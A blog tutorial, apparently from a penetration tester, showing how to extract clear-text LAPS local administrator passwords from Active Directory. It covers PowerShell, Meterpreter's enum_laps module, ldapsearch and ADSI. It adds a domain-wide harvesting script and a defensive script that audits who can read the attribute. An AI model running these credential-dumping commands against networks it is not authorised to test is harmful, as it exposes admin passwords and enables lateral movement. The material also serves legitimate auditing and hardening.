This blog post is inspired by Rob 'mubix' Fuller's post "Dump LAPS passwords with ldapsearch". Here we will look at several ways to dump the LAPS-managed local administrator password in clear text. The password lives in the ms-Mcs-AdmPwd attribute of each computer object (with its expiry in ms-Mcs-AdmPwdExpirationTime), and by default only Domain Admins can read it. Any principal that has been granted read access to the attribute can use the methods below.
Active Directory Module: Let's say RSAT is installed on the machine, so the user can import the ActiveDirectory module. After importing it, run Get-ADComputer against the target and ask for the ms-Mcs-AdmPwd attribute (it is not returned unless you request it explicitly; -Properties * also works but pulls every attribute).
Import-Module ActiveDirectory
Get-ADComputer -Identity LAB-WIN7CLONE -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
Meterpreter: If you have a shiny Meterpreter session running, you can use the post-exploitation module enum_laps (post/windows/gather/credentials/enum_laps). It queries the domain through the session and, for every computer whose password the session's user can read, returns the Distinguished Name, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime and DNS hostname.
Run this from the Meterpreter session:
run post/windows/gather/credentials/enum_laps
LDAP Search: As in Rob 'mubix' Fuller's post, we can use ldapsearch from our very own Kali Linux box to pull the ms-Mcs-AdmPwd attribute. -D takes the bind identity (AD accepts a DN or a UPN such as user@AJLAB.COM for a simple bind), -b is the search base, the filter restricts the results to computers that have a password set, and the trailing argument names the attribute to return. Older OpenLDAP builds take the host as -h 10.10.10.254; current ones require -H with a URI.
ldapsearch -x -H ldap://10.10.10.254 -D "<<username>>" -w "<<password>>" -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
Two things to keep in mind: -x is a simple bind, so the password goes over the wire in clear text unless you use ldaps:// or add -ZZ for StartTLS; and because ms-Mcs-AdmPwd is a confidential attribute, a filter on it only matches objects the bound user is allowed to read, so an empty result set usually means "no rights", not "no LAPS".
I have also created a video for all the above methods
ADSI: Probably the last method to dump the LAPS password. Let's say RSAT is not installed on the Windows box and we still want ms-Mcs-AdmPwd. Active Directory Service Interfaces (ADSI), available through .NET on any Windows host, come to our rescue: bind to the OU, find the computer object and read its properties.
$domain = New-Object System.DirectoryServices.DirectoryEntry("LDAP://OU=Managed Computers- LAPS,DC=AJLAB,DC=COM")
$computer = $domain.Children.Find("CN=LAB-WIN7CLONE")
$computer | Format-List *                          # every attribute, ms-Mcs-AdmPwd included
$computer.Properties["ms-Mcs-AdmPwd"].Value        # just the password
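The ADSI method above reads one computer at a time. The following is an added example (my own code, not from the original post or from the LAPS project) that generalizes it to the whole domain with a DirectorySearcher: it lists every computer whose LAPS password the current user can read, decodes the FILETIME expiry, and needs no RSAT. It assumes a domain-joined host and the domain AJLAB.COM and OU name used in the post; nothing else is assumed.

```powershell
# Added example, not part of the original post.
# Enumerate every computer whose LAPS password the current user can read,
# using only .NET/ADSI (no RSAT). Assumes a domain-joined host in AJLAB.COM.

# Bind to the domain root, or narrow the search to the LAPS OU from the post:
# $root = [adsi]"LDAP://OU=Managed Computers- LAPS,DC=AJLAB,DC=COM"
$root = [adsi]"LDAP://DC=AJLAB,DC=COM"

$searcher = New-Object System.DirectoryServices.DirectorySearcher($root)

# ms-Mcs-AdmPwd is a confidential attribute: the filter only matches objects
# whose password the bound user may read, so an empty result normally means
# "no rights", not "LAPS is not deployed".
$searcher.Filter   = "(&(objectCategory=computer)(ms-Mcs-AdmPwd=*))"
$searcher.PageSize = 500   # page through large domains instead of stopping at the 1000-object limit
[void]$searcher.PropertiesToLoad.AddRange(@('dNSHostName', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'))

$searcher.FindAll() | ForEach-Object {
    $p = $_.Properties   # SearchResult property names are lower-cased

    # The expiry is a Windows FILETIME (100-ns ticks since 1601-01-01 UTC).
    $expires = $null
    if ($p['ms-mcs-admpwdexpirationtime'].Count -gt 0) {
        $expires = [datetime]::FromFileTime([int64]$p['ms-mcs-admpwdexpirationtime'][0])
    }

    [pscustomobject]@{
        Host     = [string]$p['dnshostname'][0]
        Password = [string]$p['ms-mcs-admpwd'][0]
        Expires  = $expires
    }
}
```

Because the search is paged and server-side filtered, it scales to a full domain and never touches computers you cannot read; to check a single host, add (cn=LAB-WIN7CLONE) to the filter instead of post-filtering in PowerShell.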
PS: Kindly comment any other cool methods to dump LAPS password.
Note: All of the above methods only work if the bound user has read access to ms-Mcs-AdmPwd. The attribute is marked confidential, so a plain ReadProperty grant is not enough: the reader needs the control-access (extended) right on that attribute, which LAPS grants per OU with Set-AdmPwdReadPasswordPermission, and which is also implied by "All extended rights". If the extended rights of non-admin users and groups have been removed from the OU (as the LAPS documentation recommends, and as Find-AdmPwdExtendedRights lets you verify), these methods return nothing for them.
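To check which principals actually hold that right on an OU without the LAPS PowerShell module, here is an added example (my own code, not from the original post or from the LAPS project). It resolves the schemaIDGUID of ms-Mcs-AdmPwd from the forest schema, because LAPS generates that GUID when the schema is extended and it differs per forest, then walks the OU's DACL for Allow ACEs that grant ExtendedRight either on that attribute or on all extended rights. It assumes a domain-joined host and the OU DN from the post.

```powershell
# Added example, not part of the original post.
# List the principals that can read ms-Mcs-AdmPwd on an OU. Reading a confidential
# attribute requires the control-access (ExtendedRight) bit on that attribute, or
# "All extended rights" (ObjectType = empty GUID). OU DN taken from the post.

$ou = [adsi]"LDAP://OU=Managed Computers- LAPS,DC=AJLAB,DC=COM"

# 1. Resolve the schemaIDGUID of ms-Mcs-AdmPwd; it is forest-specific.
$rootDse  = [adsi]"LDAP://RootDSE"
$schemaNC = [adsi]("LDAP://" + $rootDse.Properties['schemaNamingContext'].Value)
$s = New-Object System.DirectoryServices.DirectorySearcher($schemaNC)
$s.Filter = "(&(objectClass=attributeSchema)(cn=ms-Mcs-AdmPwd))"
[void]$s.PropertiesToLoad.Add('schemaIDGUID')
$hit = $s.FindOne()
if (-not $hit) { throw "ms-Mcs-AdmPwd is not in the schema: LAPS is not installed in this forest" }
$admPwdGuid = [guid]::new([byte[]]$hit.Properties['schemaidguid'][0])

# 2. Walk the OU's DACL, including ACEs inherited from parents, and keep the
#    Allow entries that grant ExtendedRight on the attribute or on everything.
$rules = $ou.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])
$rules |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and
        ($_.ObjectType -eq $admPwdGuid -or $_.ObjectType -eq [guid]::Empty)
    } |
    Select-Object @{n = 'Principal'; e = { $_.IdentityReference }},
                  @{n = 'Grant';     e = { if ($_.ObjectType -eq [guid]::Empty) { 'All extended rights' } else { 'ms-Mcs-AdmPwd' } }},
                  IsInherited |
    Sort-Object Principal, Grant -Unique
```

Anything listed with "All extended rights" that is not an admin group is the over-grant the LAPS guidance tells you to remove. The check is deliberately narrow: it does not expand group membership, and it ignores principals with WriteDacl or WriteOwner on the OU, who could grant themselves the right; review those separately.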